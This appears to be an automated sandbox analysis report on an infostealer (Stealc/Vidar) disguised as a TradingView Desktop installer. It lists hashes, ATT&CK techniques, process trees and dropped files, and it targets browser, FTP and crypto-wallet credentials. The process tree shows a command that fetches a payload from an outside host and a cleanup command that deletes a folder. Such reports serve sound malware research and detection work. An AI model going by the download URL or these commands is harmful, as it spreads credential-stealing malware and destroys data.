stealc | d5859d9a88162423e1cc673f660859b8d28a1bc90043a29cef82a60b6575b98b

Resubmissions

30-06-2024 18:06

240630-wpsaasvepj 10

30-06-2024 18:00

240630-wlj5hsvekr 1

Analysis

max time kernel
449s
max time network
489s
platform
windows11-21h2_x64
resource
win11-20240611-en
resource tags

arch:x64arch:x86image:win11-20240611-enlocale:en-usos:windows11-21h2-x64system
submitted
30-06-2024 18:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

TradingView Desktop.exe
Size

779.2MB
MD5

e8fa1288bb7eeee03e51848faf7a5677
SHA1

17b3b9b521eae0935aa427ace0c273f3df733030
SHA256

5cc8741c9ab6011c21e2f485ee33e88d19954aa579dc0be2c64592c5392cbb05
SHA512

75aea3e803dfb34a8856204419742599b9411342ca7adf206126f4cc06c8e434764bdacaa33f353597e194799870adbbb4924dc17deee6f3c9cdce12bc67e140
SSDEEP

196608:nxO95CWNPkUhRJZPeKXXRWJbZd5d1dvbEGe5m+LjO:xSCWpJZPrnRWJFd5ndTEhjO

Score

10^/10

stealc vidar discovery spyware stealer

Malware Config

Signatures

Detect Vidar Stealer 1 IoCs
stealer

Processes:

resource yara_rule

behavioral2/memory/4140-2-0x0000000000770000-0x00000000019CA000-memory.dmp family_vidar_v7
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Downloads MZ/PE file
Executes dropped EXE 11 IoCs

Processes:

HIDGCF.exeHIDGCF.exeHIDGCF.exeHIDGCF.exeHIDGCF.exeHIDGCF.exeHIDGCF.exeHIDGCF.exeHIDGCF.exeHIDGCF.exeHIDGCF.exe

pid process

1832 HIDGCF.exe
2648 HIDGCF.exe
2320 HIDGCF.exe
2856 HIDGCF.exe
2516 HIDGCF.exe
760 HIDGCF.exe
3064 HIDGCF.exe
4560 HIDGCF.exe
2572 HIDGCF.exe
5028 HIDGCF.exe
3840 HIDGCF.exe
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

resource	yara_rule
behavioral2/memory/4140-2-0x0000000000770000-0x00000000019CA000-memory.dmp	family_vidar_v7

pid	process
1832	HIDGCF.exe
2648	HIDGCF.exe
2320	HIDGCF.exe
2856	HIDGCF.exe
2516	HIDGCF.exe
760	HIDGCF.exe
3064	HIDGCF.exe
4560	HIDGCF.exe
2572	HIDGCF.exe
5028	HIDGCF.exe
3840	HIDGCF.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

TradingView Desktop.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	TradingView Desktop.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	TradingView Desktop.exe

Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

3424 timeout.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

TradingView Desktop.exe

pid process

4140 TradingView Desktop.exe
4140 TradingView Desktop.exe
4140 TradingView Desktop.exe
4140 TradingView Desktop.exe
4140 TradingView Desktop.exe
4140 TradingView Desktop.exe

pid	process
3424	timeout.exe

pid	process
4140	TradingView Desktop.exe
4140	TradingView Desktop.exe
4140	TradingView Desktop.exe
4140	TradingView Desktop.exe
4140	TradingView Desktop.exe
4140	TradingView Desktop.exe

Suspicious use of WriteProcessMemory 28 IoCs

Processes:

TradingView Desktop.exeHIDGCF.execmd.exe

description	pid	process	target process
PID 4140 wrote to memory of 1832	4140	TradingView Desktop.exe	HIDGCF.exe
PID 4140 wrote to memory of 1832	4140	TradingView Desktop.exe	HIDGCF.exe
PID 1832 wrote to memory of 2320	1832	HIDGCF.exe	HIDGCF.exe
PID 1832 wrote to memory of 2320	1832	HIDGCF.exe	HIDGCF.exe
PID 1832 wrote to memory of 2648	1832	HIDGCF.exe	HIDGCF.exe
PID 1832 wrote to memory of 2648	1832	HIDGCF.exe	HIDGCF.exe
PID 1832 wrote to memory of 2516	1832	HIDGCF.exe	HIDGCF.exe
PID 1832 wrote to memory of 2516	1832	HIDGCF.exe	HIDGCF.exe
PID 1832 wrote to memory of 2856	1832	HIDGCF.exe	HIDGCF.exe
PID 1832 wrote to memory of 2856	1832	HIDGCF.exe	HIDGCF.exe
PID 1832 wrote to memory of 760	1832	HIDGCF.exe	HIDGCF.exe
PID 1832 wrote to memory of 760	1832	HIDGCF.exe	HIDGCF.exe
PID 1832 wrote to memory of 3064	1832	HIDGCF.exe	HIDGCF.exe
PID 1832 wrote to memory of 3064	1832	HIDGCF.exe	HIDGCF.exe
PID 1832 wrote to memory of 4560	1832	HIDGCF.exe	HIDGCF.exe
PID 1832 wrote to memory of 4560	1832	HIDGCF.exe	HIDGCF.exe
PID 1832 wrote to memory of 5028	1832	HIDGCF.exe	HIDGCF.exe
PID 1832 wrote to memory of 5028	1832	HIDGCF.exe	HIDGCF.exe
PID 1832 wrote to memory of 2572	1832	HIDGCF.exe	HIDGCF.exe
PID 1832 wrote to memory of 2572	1832	HIDGCF.exe	HIDGCF.exe
PID 1832 wrote to memory of 3840	1832	HIDGCF.exe	HIDGCF.exe
PID 1832 wrote to memory of 3840	1832	HIDGCF.exe	HIDGCF.exe
PID 4140 wrote to memory of 3784	4140	TradingView Desktop.exe	cmd.exe
PID 4140 wrote to memory of 3784	4140	TradingView Desktop.exe	cmd.exe
PID 4140 wrote to memory of 3784	4140	TradingView Desktop.exe	cmd.exe
PID 3784 wrote to memory of 3424	3784	cmd.exe	timeout.exe
PID 3784 wrote to memory of 3424	3784	cmd.exe	timeout.exe
PID 3784 wrote to memory of 3424	3784	cmd.exe	timeout.exe

C:\Users\Admin\AppData\Local\Temp\TradingView Desktop.exe
"C:\Users\Admin\AppData\Local\Temp\TradingView Desktop.exe"
1⤵
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4140

C:\ProgramData\HIDGCF.exe
C:\ProgramData\\HIDGCF.exe http://mamallan.life/new_clip.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1832

C:\ProgramData\HIDGCF.exe
C:\ProgramData\HIDGCF.exe
3⤵
- Executes dropped EXE
PID:2320

C:\ProgramData\HIDGCF.exe
C:\ProgramData\HIDGCF.exe
3⤵
- Executes dropped EXE
PID:2648

C:\ProgramData\HIDGCF.exe
C:\ProgramData\HIDGCF.exe
3⤵
- Executes dropped EXE
PID:2516

C:\ProgramData\HIDGCF.exe
C:\ProgramData\HIDGCF.exe
3⤵
- Executes dropped EXE
PID:2856

C:\ProgramData\HIDGCF.exe
C:\ProgramData\HIDGCF.exe
3⤵
- Executes dropped EXE
PID:760

C:\ProgramData\HIDGCF.exe
C:\ProgramData\HIDGCF.exe
3⤵
- Executes dropped EXE
PID:3064

C:\ProgramData\HIDGCF.exe
C:\ProgramData\HIDGCF.exe
3⤵
- Executes dropped EXE
PID:4560

C:\ProgramData\HIDGCF.exe
C:\ProgramData\HIDGCF.exe
3⤵
- Executes dropped EXE
PID:5028

C:\ProgramData\HIDGCF.exe
C:\ProgramData\HIDGCF.exe
3⤵
- Executes dropped EXE
PID:2572

C:\ProgramData\HIDGCF.exe
C:\ProgramData\HIDGCF.exe
3⤵
- Executes dropped EXE
PID:3840

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\IJDBKKJKJEBF" & exit
2⤵
- Suspicious use of WriteProcessMemory
PID:3784

C:\Windows\SysWOW64\timeout.exe
timeout /t 10
3⤵
- Delays execution with timeout.exe
PID:3424

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\HIDGCF.exe
Filesize
6KB

MD5
2890a00ef6943ed98e2b7c6e3e49ae1c

SHA1
9072a751e68fe39222aebc87ffb898a423310ce9

SHA256
0ab41930f0a18d7629031bf5cd9a8c7090c13983c1d7567b9018185f0fa18f0d

SHA512
dd01c349264e431f3ec900e05062fa4300a4f8a9219edf4f7f8014a92dadd4aae0f05cc4a103f30bdd4d9915460edb03769ffdff0c9e290acd4c89b3a16542fe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\PIYE1NLF\new_clip[1].exe
Filesize
5.3MB

MD5
7cfdc2aee2ad1a7ef6f7715178aa8f93

SHA1
fe57e4be70cf241a2c0cc2724088ae4c8830a816

SHA256
3c352a7f11ef8cca36e6d1c8a940c6c9e5e60a7d3a07c3a464a7f1e3ce035b46

SHA512
8be581dab7c20dbd95cc3987554ed5317e8dc9f22f26cfe353f1d4bc0590e767f321cda6987c2dcbdf1a7aba83cb3a2163c7cad8fcee7414c150bdf686d71469

Download Submit
memory/4140-2-0x0000000000770000-0x00000000019CA000-memory.dmp

Filesize
18.4MB

Download
memory/4140-16-0x0000000061E00000-0x0000000061EF3000-memory.dmp

Filesize
972KB

Download